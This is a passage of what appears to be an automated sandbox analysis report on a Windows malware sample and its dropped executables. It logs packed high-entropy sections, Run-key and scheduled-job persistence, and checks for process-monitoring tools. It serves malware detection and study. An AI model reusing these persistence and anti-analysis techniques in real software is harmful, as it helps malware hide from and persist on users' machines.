Source: file.exe Static PE information: section name: ogegxoql
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: ejhkawnv
Source: skotes.exe.0.dr Static PE information: section name: ogegxoql
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: r5mqFEC[1].exe.6.dr Static PE information: section name: .coS
Source: r5mqFEC.exe.6.dr Static PE information: section name: .coS
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: gdiujpci
Source: random[1].exe.6.dr Static PE information: section name: zdypqqxr
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: a7f098a093.exe.6.dr Static PE information: section name:
Source: a7f098a093.exe.6.dr Static PE information: section name: .rsrc
Source: a7f098a093.exe.6.dr Static PE information: section name: .idata
Source: a7f098a093.exe.6.dr Static PE information: section name:
Source: a7f098a093.exe.6.dr Static PE information: section name: gdiujpci
Source: a7f098a093.exe.6.dr Static PE information: section name: zdypqqxr
Source: a7f098a093.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: ygcbzohu
Source: random[1].exe0.6.dr Static PE information: section name: dmyrahus
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: e5e907fecb.exe.6.dr Static PE information: section name:
Source: e5e907fecb.exe.6.dr Static PE information: section name: .idata
Source: e5e907fecb.exe.6.dr Static PE information: section name:
Source: e5e907fecb.exe.6.dr Static PE information: section name: ygcbzohu
Source: e5e907fecb.exe.6.dr Static PE information: section name: dmyrahus
Source: e5e907fecb.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: jerbjqqv
Source: random[1].exe1.6.dr Static PE information: section name: nuqdewfy
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: 3996dc7402.exe.6.dr Static PE information: section name:
Source: 3996dc7402.exe.6.dr Static PE information: section name: .idata
Source: 3996dc7402.exe.6.dr Static PE information: section name:
Source: 3996dc7402.exe.6.dr Static PE information: section name: jerbjqqv
Source: 3996dc7402.exe.6.dr Static PE information: section name: nuqdewfy
Source: 3996dc7402.exe.6.dr Static PE information: section name: .taggant
Source: random[2].exe.6.dr Static PE information: section name:
Source: random[2].exe.6.dr Static PE information: section name: .idata
Source: random[2].exe.6.dr Static PE information: section name: tcknjbhw
Source: random[2].exe.6.dr Static PE information: section name: pazbjnlm
Source: random[2].exe.6.dr Static PE information: section name: .taggant
Source: 19cf1f0449.exe.6.dr Static PE information: section name:
Source: 19cf1f0449.exe.6.dr Static PE information: section name: .idata
Source: 19cf1f0449.exe.6.dr Static PE information: section name: tcknjbhw
Source: 19cf1f0449.exe.6.dr Static PE information: section name: pazbjnlm
Source: 19cf1f0449.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.12.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.12.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C9BE5 push ecx; ret 7_2_007C9BF8
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 9_2_007C9BE5 push ecx; ret 9_2_007C9BF8
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_032BA7AA pushad ; retf 10_3_032BA7B1
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0325714D pushad ; retf 10_3_03257159
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0325714D pushad ; retf 10_3_03257159
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0323133D push 00000031h; retf 10_3_03231340
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_03224B87 push eax; ret 10_3_03224C03
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0322D018 push ss; ret 10_3_0322D01C
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_03231061 push 00000031h; retf 10_3_03231064
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0325714D pushad ; retf 10_3_03257159
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_3_0325714D pushad ; retf 10_3_03257159
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00415057 push eax; iretd 10_2_00415058
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00418028 push esp; ret 10_2_0041802B
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0041642B push esp; ret 10_2_00416438
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00418100 push esp; iretd 10_2_00418102
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_0041811F push esp; iretd 10_2_00418135
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_004181DA push eax; iretd 10_2_004181DB
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 10_2_00414BB8 push esp; iretd 10_2_00414BD4
Source: file.exe Static PE information: section name: entropy: 7.98618837151587
Source: file.exe Static PE information: section name: ejhkawnv entropy: 7.954819740116705
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.98618837151587
Source: skotes.exe.0.dr Static PE information: section name: ejhkawnv entropy: 7.954819740116705
Source: random[1].exe.6.dr Static PE information: section name: gdiujpci entropy: 7.954839612403231
Source: a7f098a093.exe.6.dr Static PE information: section name: gdiujpci entropy: 7.954839612403231
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.97443476819522
Source: random[1].exe0.6.dr Static PE information: section name: ygcbzohu entropy: 7.953752772757039
Source: e5e907fecb.exe.6.dr Static PE information: section name: entropy: 7.97443476819522
Source: e5e907fecb.exe.6.dr Static PE information: section name: ygcbzohu entropy: 7.953752772757039
Source: random[1].exe1.6.dr Static PE information: section name: jerbjqqv entropy: 7.954382672261457
Source: 3996dc7402.exe.6.dr Static PE information: section name: jerbjqqv entropy: 7.954382672261457
Source: random[2].exe.6.dr Static PE information: section name: entropy: 7.752728161506336
Source: 19cf1f0449.exe.6.dr Static PE information: section name: entropy: 7.752728161506336
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\r5mqFEC[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3996dc7402.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d986826e57.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e5e907fecb.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19cf1f0449.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e5e907fecb.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e5e907fecb.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3996dc7402.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3996dc7402.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d986826e57.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d986826e57.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19cf1f0449.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19cf1f0449.exe Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Code function: 7_2_007C9CC2 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_007C9CC2
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
